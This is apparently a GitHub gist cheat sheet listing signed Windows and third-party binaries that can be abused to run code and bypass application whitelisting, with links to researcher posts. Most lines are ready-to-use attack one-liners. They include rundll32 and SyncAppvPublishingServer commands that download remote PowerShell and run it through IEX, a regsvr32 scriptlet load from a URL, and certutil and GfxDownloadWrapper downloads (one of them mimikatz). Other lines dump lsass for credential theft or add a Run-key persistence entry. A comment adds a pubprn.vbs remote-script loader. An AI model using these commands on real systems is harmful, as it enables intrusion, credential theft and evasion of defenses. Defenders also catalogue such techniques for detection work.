Skip to content

Instantly share code, notes, and snippets.

Embed
What would you like to do?
BinariesThatDoesOtherStuff
forfiles /p c:\windows\system32 /m notepad.exe /c calc.exe
bash.exe -c calc.exe
scriptrunner.exe -appvscript calc.exe
SyncAppvPublishingServer.exe "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX
hh.exe http://www.google.com or hh.exe c:\
certutil -Class scrobj.dll
certutil -Class http://WScript.Shell
certutil -urlcache -split -f http://example.com/file
certutil.exe -URL will fetch ANY file and download it here: C:\Users\subTee\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content
rundll32.exe javascript:"..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://ip:port/');"
RUNDLL32.EXE scrobj.dll,GenerateTypeLib test.sct http://[URL] - Doesn't exec. download only
https://twitter.com/subtee/status/777538038897397761
regsvr32 /s /n /u /i:http://example.com/file.sct scrobj.dll
msbuild.exe pshell.xml
regsvcs.exe /U regsvcs.dll regsvcs.exe regsvcs.dll
regasm.exe /U regsvcs.dll regasm.exe regsvcs.dll
bginfo.exe bginfo.bgi /popup /nolicprompt
InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll
ieexec.exe http://x.x.x.x:8080/bypass.exe
msxsl.exe customers.xml script.xsl
odbcconf.exe /f my.rsp
sqldumper.exe 464 0 0x0110:40 - Dump lsass to mimikatz comp. dump
https://twitter.com/countuponsec/status/910977826853068800
sqldumper.exe 540 0 0x01100
https://twitter.com/countuponsec/status/910969424215232518
pcalua -a c:\datafolder\tester.bat
pcalua.exe -a \\server\payload.dll
pcalua.exe -a C:\Windows\system32\javacpl.cpl -c Java
https://twitter.com/0rbz_/status/912530504871759872
C:\Program Files\Microsoft Office\root\client\AppVLP.exe calc.exe
C:\Program Files (x86)\Microsoft Office\root\client>appvlp calc.exe
https://twitter.com/0rbz_/status/915330892637331456
runscripthelper.exe
https://posts.specterops.io/bypassing-application-whitelisting-with-runscripthelper-exe-1906923658fc
winword /l dllfile.dll
https://twitter.com/subTee/status/884615369511636992
InfDefaultInstall.exe shady.inf
https://twitter.com/KyleHanslovan/status/911997635455852544
https://gist.github.com/KyleHanslovan/5e0f00d331984c1fb5be32c40f3b265a
sqldumper 540 0 0x01100
https://twitter.com/countuponsec/status/910969424215232518
fsi.exe
https://twitter.com/NickTyrer/status/904273264385589248
AppVLP.exe
"C:\Program Files\Microsoft Office\root\client\AppVLP.exe" calc.exe
"C:\Program Files (x86)\Microsoft Office\root\client\AppVLP.exe" calc.exe
AppVLP.exe \\webdav\calc.bat
SQLPS.exe
Powershell host
https://twitter.com/bryon_/status/975835709587075072
Diskshadow.exe
diskshadow.exe /s c:\test\diskshadow.txt
diskshadow> exec calc.exe
https://bohops.com/2018/03/26/diskshadow-the-return-of-vss-evasion-persistence-and-active-directory-database-extraction/
print /D:c:\ads\file.exe \\server.domain.com\tool\file.exe
print /D:c:\ads\CopyOfAutoruns.exe c:\ads\Autoruns.exe
https://www.youtube.com/watch?v=nPBcSP8M7KE
*** Non-MS binaries ***
nvuhda.exe
nvuhda6.exe
nvuhda6.exe System calc.exe
nvuhda6.exe Copy test.txt,test-2.txt
nvuhda6.exe SetReg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\malware=malware.exe
nvuhda6.exe CreateShortcut test.lnk,"Test","c:\windows\system32\calc.exe","","c:\windows\system32"
nvuhda6.exe KillApp calculator.exe
nvuhda6.exe Run foo
http://www.hexacorn.com/blog/2017/11/10/reusigned-binaries-living-off-the-signed-land/
symerr.exe ("cclib.dll" in same directory) - https://twitter.com/0rbz_/status/940028712766005248
SynTPEnh.exe /SHELLEXEC somebinary.exe - https://twitter.com/egre55/status/1052907871749459968?s=09
#Intel
GfxDownloadWrapper.exe "http://10.10.10.10/mimikatz.exe" "C:\Temp\harmless.exe" - https://twitter.com/egre55/status/1093821740298448896
#Acer
RunCmd_x64.exe C:\windows\system32\calc.exe
https://bartblaze.blogspot.com/2019/03/run-applications-and-scripts-using.html
#Plex
plexscripthost.exe #Pythonscript engine
https://twitter.com/Oddvarmoe/status/1092230434786869249
@fsacer

This comment has been minimized.

Copy link

fsacer commented Nov 11, 2017

You could add this even though it's a script:
cscript C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs localhost "script:https://gist.githubusercontent.com/enigma0x3/2e4f571fe76715640d0f8126f321ba07/raw/73c962d65059a211b5d7ea212e9a1054d632622b/new.txt"
https://twitter.com/enigma0x3/status/923311244358094848

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.
You signed in with another tab or window. Reload to refresh your session. You signed out in another tab or window. Reload to refresh your session.